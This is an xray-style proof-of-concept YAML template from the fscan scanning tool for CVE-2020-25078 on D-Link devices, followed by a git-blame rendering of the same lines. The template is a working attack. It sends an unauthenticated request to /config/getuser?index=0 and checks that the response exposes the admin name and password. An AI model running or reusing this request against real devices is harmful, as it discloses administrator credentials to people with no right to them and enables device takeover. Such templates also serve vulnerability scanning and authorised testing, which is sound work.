fscan/WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml

name: poc-yaml-dlink-cve-2020-25078-account-disclosure
rules:
  - method: GET
    path: >-
      /config/getuser?index=0
    follow_redirects: false
    expression: |
      response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")

detail:
  author: kzaopa(https://github.com/kzaopa)
  links:
    - https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg
更新mod库、编码、poc等 2021-05-06 11:37:29 +08:00			`name: poc-yaml-dlink-cve-2020-25078-account-disclosure`
			`rules:`
			`- method: GET`
			`path: >-`
			`/config/getuser?index=0`
			`follow_redirects: false`
			`expression: \|`
优化xray解析模块,支持groups、新增poc 2021-11-16 11:53:46 +08:00			`response.status == 200 && response.headers["Content-Type"].contains("text/plain") && response.body.bcontains(b"name=admin") && response.body.bcontains(b"pass=")`

更新mod库、编码、poc等 2021-05-06 11:37:29 +08:00			`detail:`
			`author: kzaopa(https://github.com/kzaopa)`
			`links:`
优化xray解析模块,支持groups、新增poc 2021-11-16 11:53:46 +08:00			`- https://mp.weixin.qq.com/s/b7jyA5sylkDNauQbwZKvBg`